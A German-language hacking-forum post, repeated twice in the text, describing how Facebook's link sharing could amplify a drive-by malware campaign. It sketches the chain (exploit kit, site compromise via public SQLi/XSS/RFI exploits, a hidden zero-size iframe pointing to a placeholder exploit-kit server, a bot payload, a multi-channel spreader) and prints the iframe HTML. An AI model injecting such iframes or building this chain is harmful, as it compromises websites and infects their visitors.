![[HaBo]](/styles/default/logoklein.png){kind=small}
rat
0
Ich habe mir jetzt mal Facebook genauer angesehen und ich muss sagen das ist der Absolute Wahnsinn für Botnet Herder (Botnet Betreiber).
Eines der schlimmsten Futures dort oder wohl das schlimmste ist wen du auf einen Link klickst sehen das alle deine Kontakte und wen du jetzt 50 Kontakte hast und einer von dennen das sieht und auch auf den link Klickt sehen das wider deren Kontakte usw usw.
So was ist so schlimm daran.
Ich kann mir auf einen Server ein Exploit kit aufsetzten wie dieses. Phoenix Exploit Kit 2.0: M86 Security
Jetzt kann ich mir zugang zu einer legalen Website verschaffen,dank Exploits Database by Offensive Security finde ich dort ja Jedemenge SQLi,XSS so wie RFI Exploits.
Auf der Gekaperten Site baue ich einen Iframe ein mit Frameboarder="0" der meinen Iframe in den Hintergrund verschwinden lässt und dann sieht der Angriff wie folgt aus.
http://www.viruslist.com/de/images/vlpub/rnar_driveby0908_pic02de.png
Das Exploit Kit ist in der Large durch die Lücken eine Malware nach zu laden wie den Zunker Bot Zunker Bot | PandaLabs Blog
Jetzt Klicke ich bei Facebook 1x auf www.myHackedSite.com und das geht an alle kontakte. 50 ist noch wenig einige haben 2000,wen der da drauf klickt dann aber holla die Waldfee.
Und jetzt kann man das ganze noch weiter führen in dem man die Malware mit einem Spreader Binded der sich über MSN,ICQ,Skype,Email und P2P verteilt.
Der währe Möglich
Das währe so als Währe der ganze Ozean voller ÖL und ein Funke fällt dort hinein. Die Malware verbreitet sich rasend schnell. ein User Infiziert kommt die Funktion zustande sich über MSN,ICQ,Skype,Email und P2P zu verbreiten und wen es dort gelungen ist geht es so weiter und weiter.
Das ist gemeingefährlich,es gibt ja Malware die sich über Facebook verbreitet,aber die macht das ja nur über Facebook und nicht in Kombination mit all den anderen Funktionen.
Eines der schlimmsten Futures dort oder wohl das schlimmste ist wen du auf einen Link klickst sehen das alle deine Kontakte und wen du jetzt 50 Kontakte hast und einer von dennen das sieht und auch auf den link Klickt sehen das wider deren Kontakte usw usw.
So was ist so schlimm daran.
Ich kann mir auf einen Server ein Exploit kit aufsetzten wie dieses. Phoenix Exploit Kit 2.0: M86 Security
Jetzt kann ich mir zugang zu einer legalen Website verschaffen,dank Exploits Database by Offensive Security finde ich dort ja Jedemenge SQLi,XSS so wie RFI Exploits.
Auf der Gekaperten Site baue ich einen Iframe ein mit Frameboarder="0" der meinen Iframe in den Hintergrund verschwinden lässt und dann sieht der Angriff wie folgt aus.
HTML:
<iframe src="www.MyExploitKitServer.com" width="0" height="0" frameborder="0">
</iframe>http://www.viruslist.com/de/images/vlpub/rnar_driveby0908_pic02de.png
Das Exploit Kit ist in der Large durch die Lücken eine Malware nach zu laden wie den Zunker Bot Zunker Bot | PandaLabs Blog
Jetzt Klicke ich bei Facebook 1x auf www.myHackedSite.com und das geht an alle kontakte. 50 ist noch wenig einige haben 2000,wen der da drauf klickt dann aber holla die Waldfee.
Und jetzt kann man das ganze noch weiter führen in dem man die Malware mit einem Spreader Binded der sich über MSN,ICQ,Skype,Email und P2P verteilt.
Der währe Möglich
Das währe so als Währe der ganze Ozean voller ÖL und ein Funke fällt dort hinein. Die Malware verbreitet sich rasend schnell. ein User Infiziert kommt die Funktion zustande sich über MSN,ICQ,Skype,Email und P2P zu verbreiten und wen es dort gelungen ist geht es so weiter und weiter.
Das ist gemeingefährlich,es gibt ja Malware die sich über Facebook verbreitet,aber die macht das ja nur über Facebook und nicht in Kombination mit all den anderen Funktionen.
Zuletzt bearbeitet:
